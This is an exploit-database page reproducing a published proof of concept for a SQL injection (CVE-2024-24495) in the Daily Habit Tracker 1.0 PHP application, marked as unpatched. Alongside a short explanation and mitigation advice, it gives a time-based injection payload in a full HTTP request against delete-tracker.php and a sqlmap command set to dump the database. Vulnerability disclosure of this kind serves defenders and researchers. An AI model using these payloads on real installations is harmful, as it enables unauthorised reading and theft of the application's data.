header-logo
Suggest Exploit
vendor:
Daily Habit Tracker
by:
Yevhenii Butenko
8.1
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Daily Habit Tracker
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2024-24495
CPE: a:daily_habit_tracker:1.0
Metasploit:
Other Scripts:
Platforms Tested: Debian
2024

Daily Habit Tracker 1.0 – SQL Injection

SQL injection is a type of security vulnerability that allows attackers to manipulate the database queries of an application. By inserting SQL queries through input data, attackers can access sensitive information, modify data, perform administrative tasks, retrieve files, and in some cases, execute commands on the operating system.

Mitigation:

To prevent SQL Injection, developers should use parameterized queries or prepared statements to sanitize user input and avoid directly embedding user input into SQL statements.
Source

Exploit-DB raw data:

# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24495

### SQL Injection:

> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.

### Affected Components:

> delete-tracker.php

### Description:

> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.

## Proof of Concept:

### Manual Exploitation

The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:

```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```

![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)

### SQLMap

Save the following request to `delete_tracker.txt`:

```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```

Use `sqlmap` with `-r` option to exploit the vulnerability:

```
sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump
```

## Recommendations

When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Navigation

Suggest Exploit

Services By CQR